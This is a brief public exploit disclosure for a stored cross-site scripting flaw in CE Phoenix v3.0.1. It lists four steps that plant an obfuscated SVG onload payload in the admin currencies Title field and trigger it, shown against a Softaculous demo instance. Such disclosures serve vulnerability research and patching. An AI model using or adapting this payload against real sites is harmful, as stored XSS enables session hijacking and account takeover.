CE Phoenix Version Exploit, Stored XSS

# Exploit Title: CE Phoenix Version  - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix

## POC:

1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button

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